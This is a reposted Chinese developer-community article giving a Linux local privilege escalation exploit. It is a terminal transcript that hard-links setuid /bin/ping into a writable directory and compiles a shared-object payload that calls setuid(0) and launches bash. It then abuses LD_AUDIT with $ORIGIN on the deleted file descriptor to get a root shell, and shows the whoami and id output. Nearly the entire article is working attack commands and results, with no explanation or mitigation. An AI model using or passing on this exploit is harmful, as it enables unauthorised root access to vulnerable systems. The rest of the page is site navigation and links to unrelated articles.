AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Linux Local Privilege exp

2017-11-16 938
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

 [met3or@c3 /]$ ls -al |grep exp
drwxrwxrwx   2 root root    4096 Oct 19 19:25 exp
[met3or@c3 /]$ cd exp
[met3or@c3 exp]$ mkdir exploit
[met3or@c3 exp]$ ls -al
drwxrwxrwx 3 root   root   4096 Oct 19 19:26 .
drwxr-xr-x 26 root   root   4096 Oct 19 19:24 ..
drwxrwxr-x 2 met3or met3or 4096 Oct 19 19:26 exploit
[met3or@c3 exp]$ ln /bin/ping /exp/exploit/target
[met3or@c3 exp]$ exec 3< /exp/exploit/target 
[met3or@c3 exp]$ ls -l /proc/$$/fd/3
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target
[met3or@c3 exp]$ rm -rf /exp/exploit/
[met3or@c3 exp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target (deleted)
[met3or@c3 exp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[met3or@c3 exp]$ gcc -w -fPIC -shared -o /exp/exploit payload.c
[met3or@c3 exp]$ ls -l /exp/exploit
-rwxrwxr-x 1 met3or met3or 4223 Oct 19 19:27 /exp/exploit
[met3or@c3 exp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@c3 exp]# whoami
root
[root@c3 exp]# id
uid=0(root) gid=510(met3or) groups=510(met3or)

看的懂的人懂,看不懂的熟悉linux相关基础知识去~

















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/440265,如需转载请自行联系原作者

文章标签:
Linux
C语言
Shell
关键词:
Linux local
Linux privilege
Linux exp
技术小美
目录
相关文章
爱你三千遍斯塔克
|
Linux Windows
Linux01---目录结构,Linux系统下只有一个最顶级的树/,Windows系统有盘符概念,而Linux系统没有盘符概念,整个系统都在/根目录下,Linux 系统写法 /user/local
Linux01---目录结构,Linux系统下只有一个最顶级的树/,Windows系统有盘符概念,而Linux系统没有盘符概念,整个系统都在/根目录下,Linux 系统写法 /user/local
爱你三千遍斯塔克
194 0
游客azrgg3hrmowpy
|
关系型数据库 MySQL Linux
Linux连接MySQL时的错误:Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock'
连接本地的MySQL数据库引擎时候出现的错误。用mysql_error()函数获取到错误提示:
游客azrgg3hrmowpy
15051 3
杀死一只知更鸟debug
|
Oracle Java 关系型数据库
Linux下JDK环境的配置及 bash: /usr/local/java/bin/java: cannot execute binary file: exec format error问题的解决
如果遇到"exec format error"问题,文章建议先检查Linux操作系统是32位还是64位,并确保安装了与系统匹配的JDK版本。如果系统是64位的,但出现了错误,可能是因为下载了错误的JDK版本。文章提供了一个链接,指向Oracle官网上的JDK 17 Linux版本下载页面,并附有截图说明。
杀死一只知更鸟debug
2597 0
Linux下JDK环境的配置及 bash: /usr/local/java/bin/java: cannot execute binary file: exec format error问题的解决
快捷资讯
|
自然语言处理 安全 Shell
Linux 提权-SUID/SGID_1 本文通过 Google 翻译 SUID | SGID Part-1 – Linux Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。
接下来,让我们看看 SUID3NUM 在枚举 SUID 二进制文件方面的表现如何。 3.2、枚举 SUID 二进制文件 – SUID3NUM 我们将用来枚举 SUID 二进制文件的第二个工具是 SUID3NUM。这是一个很棒的工具,因为它是专门为枚举 SUID 二进制文件而创建的。但这还不是全部,它还提供了可用于提升权限的命令(命令从 GTFOBins 中提取)。 这还不是最好的部分,SUID3NUM 还具有内置的 autopwn 功能,可以通过 -e 开关激活! 在 OSCP 考试中也使用此工具,只要您不使用自动利用功能。 3.2.1、下载并执行 SUID3NUM 我们可以从 GitHubs
快捷资讯
173 0
前端歌谣
|
关系型数据库 MySQL 应用服务中间件
linux篇-Parse error: syntax error, unexpected ‘new’ (T_NEW) in /usr/local/nginx/html/cacti/lib/adodb
linux篇-Parse error: syntax error, unexpected ‘new’ (T_NEW) in /usr/local/nginx/html/cacti/lib/adodb
前端歌谣
330 0
linux篇-Parse error: syntax error, unexpected ‘new’ (T_NEW) in /usr/local/nginx/html/cacti/lib/adodb
开源Linux
|
Linux
16.7 Linux /etc/rc.d/rc.local配置文件
在 /etc/rc[06].d/ 目录中的程序启动之后,系统的启动就已经完成。不过,我们总有一些程序是需要在系统启动之后随着系统一起启动的。这时我们并不需要自己把需要启动的服务链接到 /etc/rc3.d/ 目录中,因为系统给我们准备了 /etc/rc.d/rc.local 配置文件。
开源Linux
381 0
16.7 Linux /etc/rc.d/rc.local配置文件
小蓝枣
|
Oracle 关系型数据库 Linux
linux服务器oracle数据库导出dmp文件功能演示,备份数据库命令。exp命令显示command not found解决方法,EXP-00028: 无法打开dmp进行写入问题解决
linux服务器oracle数据库导出dmp文件功能演示,备份数据库命令。exp命令显示command not found解决方法,EXP-00028: 无法打开dmp进行写入问题解决
小蓝枣
1093 0
linux服务器oracle数据库导出dmp文件功能演示,备份数据库命令。exp命令显示command not found解决方法,EXP-00028: 无法打开dmp进行写入问题解决
前端歌谣
|
应用服务中间件 Linux
linux篇-tomcat:Cannot find /usr/local/tomcat1/bin/setclasspath.sh
linux篇-tomcat:Cannot find /usr/local/tomcat1/bin/setclasspath.sh
前端歌谣
597 0
技术小阿哥
|
Oracle 关系型数据库 Linux
解决Linux系统下exp导入EXP-00028异常
技术小阿哥
2925 0
科技小能手
|
网络协议 Linux 数据库
解决C3P0在Linux下Failed to get local InetAddress for VMID问题
科技小能手
1899 0

热门文章

最新文章

  • 1
    Linux开启Docker远程访问并设置安全访问(证书密钥),附一份小白一键设置脚本哦!(一)
  • 2
    linux中的多线程之多线程术语
  • 3
    Linux笔记(shell基础,历史命令,命令补全/别名,通配符,输出重定向)
  • 4
    linux下练习 c++ 容器的vector的特性
  • 5
    Linux内核学习(四):Bootloader的特种兵-Uboot(二)
  • 6
    linux系统下部署python自动化程序并配置Jenkins并定时执行
  • 7
    Linux自学笔记——http协议进阶及httpd配置(2)
  • 8
    Linux 系统性能分析工具sar一
  • 9
    【Linux】关于普通用户无法使用sudo指令的解决方案
  • 10
    嵌入式linux产品USB设备动态监控技术研究
  • 1
    深度解析:Linux内核调度策略的演变与优化
    446
  • 2
    linux小技巧: 可以补全命令 别名永久有效
    246
  • 3
    linux系统 安装、管理程序
    205
  • 4
    linux 对文件内容的查看、归档 及 vim基本操作
    294
  • 5
    linux 基本知识与命令
    187
  • 6
    探索Linux操作系统的内核模块
    388
  • 7
    深入理解 Linux 文件系统的权限管理
    447
  • 8
    深入理解PHP7的返回值类型声明深入理解 Linux 文件系统的权限管理
    163
  • 9
    蓝易云 - Linux常用命令dhcpd命令
    160
  • 10
    蓝易云 - 【Linux】如何在linux系统重启或启动时执行命令或脚本(也支持docker容器内部)
    338

    • 相关课程

    更多
  • Linux MySQL服务器搭建与应用
  • Linux用户和组管理
  • Linux服务器运维基本操作
  • Linux企业运维实战 - 入门及常用命令
  • Linux Shell 编程入门与实战
  • Linux网络进阶 - TCP/IP协议及OSI七层模型

    • 相关电子书

    更多
  • Alibaba Cloud Linux 3 发布
  • ECS系统指南之Linux系统诊断
  • ECS运维指南 之 Linux系统诊断

    • 相关实验场景

    更多
  • Linux指令入门-系统管理

    • 推荐镜像

    更多
  • mxlinux-iso
  • archlinuxarm
  • archlinuxcn
    • 下一篇
    基于Python+Vue开发的口腔牙科预约管理系统